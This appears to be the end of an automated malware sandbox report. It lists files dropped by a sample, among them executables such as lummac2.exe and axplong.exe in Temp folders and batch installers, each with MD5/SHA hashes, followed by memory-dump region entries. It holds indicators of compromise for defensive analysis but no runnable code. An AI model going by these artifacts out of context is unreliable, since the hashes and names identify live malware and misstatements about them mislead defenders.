SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD57b420d96fa2117abb87b8f3af37a57a0
SHA13327c33b435c07ce15638e0efd9f29e4c9858334
SHA256947dd2bb29bf4327760a51ed8b1562dae209b0220e577f7a3b1455d6338f8669
SHA51280350fc6e6776db62932671b7f2084137799265aa6437b7d5adb3cc89d9c2d9be4e9f1e8153d9f11f21d43f0f363f9161e843293c7ef9580412141fca1900f35
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e174236a4e15868e6a023fe2141d94d9
SHA1d7bacf76862f5f7ed3006db1fc3f6f45d81b3b9a
SHA2567fe2bd624ce6f6f7eab6822b2d8d6dcd73a4f8de595c7c14b6f20886340d20d1
SHA51251ce5e1a29e60254626db13eba63bb44eacf62996f56dd4165e21d0f51aaefafacf87b0a4c90464ab61c669e1bde8dae2ab1e7f0b05f2ec48070b9a7df4087e3
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exeFilesize
297KB
MD55d860e52bfa60fec84b6a46661b45246
SHA11259e9f868d0d80ac09aadb9387662347cd4bd68
SHA256b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30
SHA51204ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exeFilesize
218KB
MD5d80bb65fe6aa18cc152a957eec8acfaa
SHA1b7fe6c68644aa5ec7641fa0c15dd9f5a00c9869b
SHA2565c2ab349bff2012fc64be9e71010c9852250e3b8aa5b71229a6e30e7e1ba8dc2
SHA512ead0b903092a722606fc08d7e05e210ae6d3003bb4c794ec2dd89164a7369df890c99bded1dcec50fd61059ad7ee96bdaae863a4fa1e1820901f90f0b4d4bb39
-
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exeFilesize
2.5MB
MD5ffada57f998ed6a72b6ba2f072d2690a
SHA16857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
SHA256677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
SHA5121de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exeFilesize
522KB
MD570a578f7f58456e475facd69469cf20a
SHA183e147e7ba01fa074b2f046b65978f838f7b1e8e
SHA2565c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a
SHA512707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exeFilesize
310KB
MD56e3d83935c7a0810f75dfa9badc3f199
SHA19f7d7c0ea662bcdca9b0cda928dc339f06ef0730
SHA256dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed
SHA5129f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exeFilesize
415KB
MD507101cac5b9477ba636cd8ca7b9932cb
SHA159ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1
SHA256488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77
SHA51202240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exeFilesize
154KB
MD55f331887bec34f51cca7ea78815621f7
SHA12eb81490dd3a74aca55e45495fa162b31bcb79e7
SHA256d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8
SHA5127a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d
-
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exeFilesize
659KB
MD5bbd06263062b2c536b5caacdd5f81b76
SHA1c38352c1c08fb0fa5e67a079998ef30ebc962089
SHA2561875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9
SHA5127faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad
-
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exeFilesize
5.8MB
MD56c149b39619395a8ba117a4cae95ba6f
SHA13ef8be98589745ecce5522dd871e813f69a7b71b
SHA256c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8
SHA512866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4
-
C:\Users\Admin\AppData\Local\Temp\6.exeFilesize
4.8MB
MD55bb3677a298d7977d73c2d47b805b9c3
SHA191933eb9b40281e59dd7e73d8b7dac77c5e42798
SHA25685eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f
SHA512d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeFilesize
1.8MB
MD54eef36b2c02ad8525ba1cfe7790dffbb
SHA1446809be411edad4e9d44fc6633cda3c2e1920ec
SHA25679674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044
SHA51217e620916713ed5329e7f3895fcecfe2374cee0b2f079599f1e83f62d422fdcb0b03160a37f64415b7ebc2577014ed1999fda59c65e277ec030f368523bbbb98
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.batFilesize
1KB
MD50be4cbfa51fe5f8010e78553a28f2779
SHA1ae21783c148ae1443fa87a43b9b51cb0ab1a799b
SHA256cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90
SHA512337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h2j0dw3y.5kn.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
568B
MD5e861a08036b9eb5f216deb58e8a7934d
SHA15f12dd049df2f88d95f205a4adc307df78ac16ee
SHA256e8315164849216f4c670c13b008e063da2176efb5d08939caa321e39a33035eb
SHA5127ea2fd3b085bd4b3e27d4dda36e079ec8910173cc2b33ccd06698051eb7d5f2818ed9000761d1fc44e354c06d015feb16e77958dab8a3969a0cee2fd453ca0c9
-
\??\pipe\crashpad_2136_AQJPZWQQXJUBGOEIMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/992-400-0x0000000000E50000-0x000000000166E000-memory.dmpFilesize
8.1MB
-
memory/992-399-0x00000000017F0000-0x00000000017F1000-memory.dmpFilesize
4KB
-
memory/2124-576-0x00007FF77A580000-0x00007FF77ABB6000-memory.dmpFilesize
6.2MB
-
memory/2124-504-0x00007FF77A580000-0x00007FF77ABB6000-memory.dmpFilesize
6.2MB
-
memory/2320-287-0x0000023FE3F20000-0x0000023FE3F32000-memory.dmpFilesize
72KB
-
memory/2320-288-0x0000023FE3CE0000-0x0000023FE3CEA000-memory.dmpFilesize
40KB
-
memory/2388-68-0x0000000000BB0000-0x0000000000BB1000-memory.dmpFilesize
4KB
-
memory/2388-66-0x0000000000BB0000-0x0000000000BB1000-memory.dmpFilesize
4KB
-
memory/2492-179-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/2492-182-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/2752-181-0x0000000000400000-0x0000000000441000-memory.dmpFilesize
260KB
-
memory/3128-250-0x00000000098A0000-0x00000000098BE000-memory.dmpFilesize
120KB
-
memory/3128-249-0x0000000009900000-0x0000000009976000-memory.dmpFilesize
472KB
-
memory/3128-252-0x000000000AB50000-0x000000000B07C000-memory.dmpFilesize
5.2MB
-
memory/3128-251-0x000000000A450000-0x000000000A612000-memory.dmpFilesize
1.8MB
-
memory/3128-227-0x0000000000400000-0x0000000000470000-memory.dmpFilesize
448KB
-
memory/3136-71-0x0000000006F60000-0x0000000006FB0000-memory.dmpFilesize
320KB
-
memory/3136-43-0x0000000005610000-0x00000000056A2000-memory.dmpFilesize
584KB
-
memory/3136-41-0x0000000000B70000-0x0000000000BC0000-memory.dmpFilesize
320KB
-
memory/3136-46-0x0000000005930000-0x0000000005A3A000-memory.dmpFilesize
1.0MB
-
memory/3136-69-0x0000000006270000-0x00000000062D6000-memory.dmpFilesize
408KB
-
memory/3136-42-0x0000000005B20000-0x00000000060C4000-memory.dmpFilesize
5.6MB
-
memory/3136-47-0x0000000005850000-0x0000000005862000-memory.dmpFilesize
72KB
-
memory/3136-48-0x00000000058B0000-0x00000000058EC000-memory.dmpFilesize
240KB
-
memory/3136-45-0x00000000066F0000-0x0000000006D08000-memory.dmpFilesize
6.1MB
-
memory/3136-40-0x0000000072EBE000-0x0000000072EBF000-memory.dmpFilesize
4KB
-
memory/3136-44-0x00000000055E0000-0x00000000055EA000-memory.dmpFilesize
40KB
-
memory/3136-160-0x0000000072EBE000-0x0000000072EBF000-memory.dmpFilesize
4KB
-
memory/3136-49-0x0000000005A40000-0x0000000005A8C000-memory.dmpFilesize
304KB
-
memory/3468-5-0x0000000000240000-0x00000000006E6000-memory.dmpFilesize
4.6MB
-
memory/3468-0-0x0000000000240000-0x00000000006E6000-memory.dmpFilesize
4.6MB
-
memory/3468-17-0x0000000000240000-0x00000000006E6000-memory.dmpFilesize
4.6MB
-
memory/3468-3-0x0000000000240000-0x00000000006E6000-memory.dmpFilesize
4.6MB
-
memory/3468-2-0x0000000000241000-0x000000000026F000-memory.dmpFilesize
184KB
-
memory/3468-1-0x00000000772A4000-0x00000000772A6000-memory.dmpFilesize
8KB
-
memory/3648-147-0x00000203D4390000-0x00000203D43B2000-memory.dmpFilesize
136KB
-
memory/3668-87-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-653-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-256-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-228-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-537-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-161-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-715-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-18-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-685-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-684-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-683-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-88-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-664-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-290-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-19-0x0000000000871000-0x000000000089F000-memory.dmpFilesize
184KB
-
memory/3668-638-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-20-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-50-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-70-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/3668-21-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/4884-67-0x0000000000400000-0x0000000000450000-memory.dmpFilesize
320KB
-
memory/5364-603-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5364-602-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5364-601-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5364-600-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5364-599-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5364-606-0x0000000140000000-0x000000014000E000-memory.dmpFilesize
56KB
-
memory/5452-613-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-607-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-616-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-617-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-610-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-618-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-624-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-609-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-615-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-612-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-611-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-608-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-637-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5452-614-0x00000000003E0000-0x0000000000400000-memory.dmpFilesize
128KB
-
memory/5452-636-0x0000000140000000-0x0000000140848000-memory.dmpFilesize
8.3MB
-
memory/5856-573-0x00000207AFB10000-0x00000207AFB1A000-memory.dmpFilesize
40KB
-
memory/5856-582-0x00000207AFCB0000-0x00000207AFCBA000-memory.dmpFilesize
40KB
-
memory/5856-580-0x00000207AFC70000-0x00000207AFC78000-memory.dmpFilesize
32KB
-
memory/5856-579-0x00000207AFCC0000-0x00000207AFCDA000-memory.dmpFilesize
104KB
-
memory/5856-578-0x00000207AFC60000-0x00000207AFC6A000-memory.dmpFilesize
40KB
-
memory/5856-571-0x00000207AFA30000-0x00000207AFA4C000-memory.dmpFilesize
112KB
-
memory/5856-581-0x00000207AFCA0000-0x00000207AFCA6000-memory.dmpFilesize
24KB
-
memory/5856-577-0x00000207AFC80000-0x00000207AFC9C000-memory.dmpFilesize
112KB
-
memory/5856-572-0x00000207AFA50000-0x00000207AFB05000-memory.dmpFilesize
724KB
-
memory/6000-658-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/6000-656-0x0000000000870000-0x0000000000D16000-memory.dmpFilesize
4.6MB
-
memory/6052-574-0x00000000008F0000-0x0000000000946000-memory.dmpFilesize
344KB
-
memory/6052-575-0x00000000008F0000-0x0000000000946000-memory.dmpFilesize
344KB